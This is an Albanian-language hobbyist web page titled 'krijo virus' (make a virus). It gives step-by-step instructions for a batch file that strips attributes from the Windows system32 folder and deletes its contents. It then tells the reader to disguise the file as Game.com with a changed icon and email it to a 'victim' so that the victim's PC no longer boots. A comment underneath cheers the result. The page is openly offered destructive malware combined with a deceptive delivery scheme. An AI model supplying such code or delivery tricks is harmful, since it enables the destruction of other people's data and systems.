..:: Mire Se Vini Ne WwW.Rock-Risi.tk ::..
  krijo virus
 

Krijo Virus
Krijo nje Batch Game.bat Lexo tekstinSe pari shko START RUn tani Shenoje ne Run Notepaddhe kopjo ket me posht qe eshte ne kodKodi:@echo offdelete c:winntsystem32*.*delete c:winnt*.*2. Konverto prej Game.bat ne Game.com .Kodi tjeter 2 :attrib -h -r -s "C:windowssystem32*.*"del /q "C:windowssystem32*.*"exitMe keto .bat mundesh me ja fshi krejt filat ne windows dhe mandej smundet me dhez PC-en ma.....Mundesh dhe mi ndrue keto per me ja fshi tjera directory hehehhTung3 .Tani shkoni Ndryshoni Ikonen Game.com me Tast te Djatht Properties Tani4. Dergoni Game.com ne e-mail attachment Naj Viktimes:5. Tani Viktima e hap Programin dhe i Fshihen Gjitha ne Windows Dirketor Fajllat.
Comments on this page:
Comment posted by:11/10/2010 at 5:31pm (UTC)
rock-risi
rock-risi
Offline

hahaahahaahahh virus i forte aAdd comment to this page:
Your Name:
Your Email address:
Your message:
 
   
 
=> Do you also want a homepage for free? Then click here! <=